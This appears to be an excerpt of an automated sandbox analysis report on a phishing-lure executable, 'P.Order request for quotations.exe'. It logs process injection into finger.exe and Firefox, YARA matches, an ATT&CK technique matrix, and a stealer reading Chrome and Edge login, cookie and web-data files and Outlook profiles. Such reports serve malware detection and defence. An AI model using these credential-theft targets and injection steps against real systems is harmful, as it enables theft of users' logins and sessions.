                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtOpenFile: Direct from: 0x77D62DCCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtOpenKeyEx: Direct from: 0x77D62B9CJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Memory written: C:\Users\user\Desktop\P.Order request for quotations.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Section loaded: NULL target: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe protection: read write
                      Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\finger.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\finger.exe | Thread register set: target process: 6116
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Process created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                      Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe | Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000000.1079628160.0000000001271000.00000002.00000001.00040000.00000000.sdmp, Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3361359506.0000000001271000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Queries volume information: C:\Users\user\Desktop\P.Order request for quotations.exe VolumeInformation
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe | Queries volume information: C:\Users\user\AppData\Roaming\HashSize.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match | File source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | 111 Scripting | Valid Accounts | 1 Scheduled Task/Job | 111 Scripting | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 113 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 312 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 321 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | NTDS | 3 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 2 Registry Run Keys / Startup Folder | 1 Software Packing | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 3 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                      Behavior Graph: ID: 1634999, Sample: P.Order request for quotati..., Startdate: 11/03/2025, Architecture: WINDOWS, Score: 100
